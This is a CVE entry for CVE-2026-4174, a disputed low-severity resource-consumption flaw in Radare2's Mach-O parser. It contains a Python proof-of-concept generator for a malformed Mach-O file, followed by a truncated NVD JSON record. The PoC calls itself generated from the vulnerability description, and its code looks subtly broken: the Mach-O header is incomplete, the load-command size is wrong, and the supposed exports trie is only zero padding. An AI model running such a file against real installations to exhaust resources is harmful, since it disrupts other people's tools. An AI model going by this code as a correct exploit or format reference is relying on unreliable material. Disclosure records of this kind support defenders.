CVE-2026-4174

#!/usr/bin/env python3 """ CVE-2026-4174 PoC - Radare2 Mach-O Parser Resource Consumption Generated PoC based on vulnerability description """ import struct import sys def create_malicious_macho(): """ Generate a malicious Mach-O file that triggers resource consumption in Radare2's walk_exports_trie function """ # Mach-O magic number (64-bit) MAGIC = 0xfeedfacf CPU_TYPE_X86_64 = 0x01000007 CPU_SUBTYPE_ALL = 0x80000003 FILE_TYPE_DYLIB = 0xf # Create a minimal 64-bit Mach-O header header = struct.pack('<IIIII', MAGIC, # magic CPU_TYPE_X86_64, # cputype CPU_SUBTYPE_ALL, # cpusubtype FILE_TYPE_DYLIB, # filetype 1 # ncmds ) # Load command - LC_DYSYMTAB (symbol table) cmd_size = 24 cmd_data = struct.pack('<IIII', 0x0B, # cmd (LC_DYSYMTAB) cmd_size, # cmdsize 0, # ilocalsym 0 # iextdefsym ) # Create exports trie section with malformed data # This triggers excessive recursion in walk_exports_trie malformed_export = b'\x00' * 1000 # Padding to cause recursion print('[+] Malicious Mach-O file structure created') print('[+] This file targets walk_exports_trie function in libr/bin/format/mach0/mach0.c') print('[+] When opened by Radare2, it may cause resource exhaustion') return header + cmd_data + malformed_export if __name__ == '__main__': print('CVE-2026-4174 PoC Generator') print('Target: Radare2 < 6.1.2') print('Component: Mach-O File Parser (walk_exports_trie)') malicious_data = create_malicious_macho() output_file = 'malicious.mach-o' with open(output_file, 'wb') as f: f.write(malicious_data) print(f'[+] PoC written to: {output_file}')

{"cve": {"id": "CVE-2026-4174", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:57.890", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Radare2 5.9.9. This issue affects the function walk_exports_trie of the file libr/bin/format/mach0/mach0.c of the component Mach-O File Parser. Such manipulation leads to resource consumption. The attack can only be performed from a local environment. The exploit has been disclosed to the public and may be used. The existence of this vulnerability is still disputed at present. Upgrading to version 6.1.2 is capable of addressing this issue. The name of the patch is 4371ae84c99c46b48cb21badbbef06b30757aba0. You should upgrade the affected component. The code maintainer states that, \"[he] wont consider this bug a DoS\"."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en Radare2 5.9.9. Este problema afecta a la función walk_exports_trie del archivo libr/bin/format/mach0/mach0.c del componente Mach-O File Parser. Dicha manipulación conduce al consumo de recursos. El ataque solo puede realizarse desde un entorno local. El exploit ha sido divulgado al público y puede ser utilizado. La existencia de esta vulnerabilidad aún está en disputa actualmente. La actualización a la versión 6.1.2 es capaz de abordar este problema. El nombre del parche es 4371ae84c99c46b48cb21badbbef06b30757aba0. Debería actualizar el componente afectado. El mantenedor del código afirma que, 'no considerará este error un DoS'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/ToddAWalter/radare2/commit/4371ae84c99c46b48cb21badbbef06b30757aba0", "source": "[email protected]"}, {"url": "https://github.com/radareorg/radare2/issues/25482", "source": "[email protected]"}, {"url": "https://github.com/radareorg/radare2/milestone/94", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/25620145/gen_macho_poc.py", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351081", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351081", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769799", " ... (truncated)